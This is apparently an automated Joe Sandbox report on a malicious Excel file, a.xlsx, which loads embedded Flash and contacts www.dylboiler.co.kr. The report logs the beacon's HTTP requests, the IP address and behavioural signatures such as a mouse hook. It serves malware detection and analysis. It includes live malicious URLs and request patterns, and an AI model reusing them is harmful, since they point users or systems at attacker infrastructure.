Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:44908
Start time:19:02:57
Joe Sandbox Product:CloudBasic
Start date:03.02.2018
Overall analysis duration:0h 4m 20s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:a.xlsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal64.evad.expl.winXLSX@1/7@2/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 60
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE


Detection

StrategyScoreRangeReportingDetection
Threshold640 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for domain / URLShow sources
Source: www.dylboiler.co.krvirustotal: Detection: 4%Perma Link
Antivirus detection for submitted fileShow sources
Source: a.xlsxvirustotal: Detection: 22%Perma Link

Exploits:

barindex
Microsof Office program loads Macromedia Flash PlayerShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: EXCEL.EXEBinary or memory string: DirectInput8Create
Installs a global mouse hookShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindows user hook set: 0 mouse low level C:\Windows\system32\DINPUT8.dll

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: www.dylboiler.co.kr
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A0E0FA.emf
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /crossdomain.xml HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.dylboiler.co.kr
Urls found in memory or binary dataShow sources
Source: EXCEL.EXEString found in binary or memory: HTTP://
Source: EXCEL.EXEString found in binary or memory: HTTPS://
Source: EXCEL.EXEString found in binary or memory: HTTPS://HTTP://o
Source: EXCEL.EXEString found in binary or memory: file://
Source: EXCEL.EXEString found in binary or memory: file:///
Source: EXCEL.EXEString found in binary or memory: file:////
Source: EXCEL.EXEString found in binary or memory: file:////#?
Source: EXCEL.EXEString found in binary or memory: file:///C:
Source: EXCEL.EXEString found in binary or memory: file:///local
Source: EXCEL.EXEString found in binary or memory: file:///localWithNet
Source: EXCEL.EXEString found in binary or memory: file:///localWithNetfile:///localfile://dummyCould
Source: EXCEL.EXEString found in binary or memory: file://pdfmediahttpCookie:URLStreamReadThreadc
Source: EXCEL.EXEString found in binary or memory: ftp://
Source: EXCEL.EXEString found in binary or memory: ftp://pt-PTpt-BRes-ES
Source: EXCEL.EXEString found in binary or memory: http://
Source: EXCEL.EXEString found in binary or memory: http://%s
Source: EXCEL.EXEString found in binary or memory: http://%s/
Source: EXCEL.EXEString found in binary or memory: http://%shttp://a.SharedObject.BadPersistenceSharedObject.UriMismatchpendingReserved
Source: EXCEL.EXEString found in binary or memory: http://a.
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/express/version_win_
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_x
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/https://fpdownload.macromedia.com/get/https://www.macromedia.c
Source: EXCEL.EXEString found in binary or memory: http://https://ftp://file://file:///%02XabczdhcheckPolicyFileexactFitfailed
Source: EXCEL.EXEString found in binary or memory: http://localhost:8080/axis/services/urn:EDCLicenseService
Source: EXCEL.EXEString found in binary or memory: http://purl.o
Source: EXCEL.EXEString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: EXCEL.EXEString found in binary or memory: http://www.
Source: EXCEL.EXE, activeX1.binString found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php
Source: EXCEL.EXEString found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F5
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.com
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.com/go/player_settings_
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.com/go/player_settings_.Unmuted.MutedCamera.UnmutedCamera.MutedMicrophone.Unmu
Source: EXCEL.EXE, crossdomain[1].xml.2.drString found in binary or memory: http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
Source: EXCEL.EXEString found in binary or memory: http://www.openssl.org/support/faq.html
Source: EXCEL.EXEString found in binary or memory: http://www.openssl.org/support/faq.html.....................
Source: EXCEL.EXEString found in binary or memory: https://
Source: EXCEL.EXEString found in binary or memory: https://auth.adobefpl.com/1/
Source: EXCEL.EXEString found in binary or memory: https://fpdownload.macromedia.com/get/
Source: EXCEL.EXEString found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
Source: EXCEL.EXEString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /crossdomain.xml HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive

System Summary:

barindex
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: Flash.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: EXCEL.EXE
Binary contains paths to development resourcesShow sources
Source: EXCEL.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification labelShow sources
Source: classification engineClassification label: mal64.evad.expl.winXLSX@1/7@2/2
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Excel
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRE54F.tmp
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: a.xlsxVirustotal: hash found
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Stores large binary data to the registryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey value created or modified: HKEY_USERS\Software\Microsoft\Office\14.0\Excel FontInfoCache
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXENetwork Connect: 114.108.131.63 80

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 44908 Sample: a.xlsx Startdate: 03/02/2018 Architecture: WINDOWS Score: 64 13 www.dylboiler.co.kr 2->13 19 Antivirus detection for domain / URL 2->19 21 Antivirus detection for submitted file 2->21 6 EXCEL.EXE 58 49 2->6         started        signatures3 process4 dnsIp5 15 www.dylboiler.co.kr 114.108.131.63, 49172, 49173, 80 LGDACOMLGDACOMCorporationKR Korea Republic of 6->15 17 8.8.8.8, 53, 63758 GOOGLE-GoogleIncUS United States 6->17 11 C:\Users\user\Desktop\~$a.xlsx, data 6->11 dropped 23 System process connects to network (likely due to code injection or exploit) 6->23 25 Microsof Office program loads Macromedia Flash Player 6->25 file6 signatures7

Simulations

Behavior and APIs

TimeTypeDescription
19:03:29API Interceptor2x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
19:03:29API Interceptor657x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

SourceDetectionCloudLink
a.xlsx22%virustotalBrowse

Dropped Files

No Antivirus matches

Domains

SourceDetectionCloudLink
www.dylboiler.co.kr4%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
LGDACOMLGDACOMCorporationKR31youtubeer@youtube.exeecb0852024820c4b3426c5e10570e9397e887a959d1a5827578a07200f51afffmaliciousBrowse
  • 211.169.146.91
winupdate.exe2161c4f303c9b5f38a58fa1dedf3f70329c6009a273d6be0a2b4a945f2114b02maliciousBrowse
  • 110.45.144.153
Lx9gbXEjct.exed750ac2061df6fd607d901ad918e9e1f0693e044e399c863d8d09eb0c866100amaliciousBrowse
  • 211.234.63.232
44PI-7993INV#-2017.exe1356d7bc326b6b2837a6a3fd6a740487d8493cf7336275567bbf7be5be541505maliciousBrowse
  • 211.234.63.232
rinnai.co.krmaliciousBrowse
  • 58.72.180.22
7#U7eJQOO5OUO54VOC737089BY30.js1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0maliciousBrowse
  • 211.40.221.67
7#U7eJQOO5OUO54VOC737089BY30.js1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0maliciousBrowse
  • 211.40.221.67
19QUOTATION.exe1d8730fb8718b3e9765cf8146c71da54d853fc5da73065a7bfd3509ec8ec261bmaliciousBrowse
  • 211.234.63.232
LWop1cXK0.exe33da905c31916f6c8f457eba354991f2018e7d7c888f160843b42a229aa078c0maliciousBrowse
  • 114.108.160.134

Dropped Files

No context

Screenshot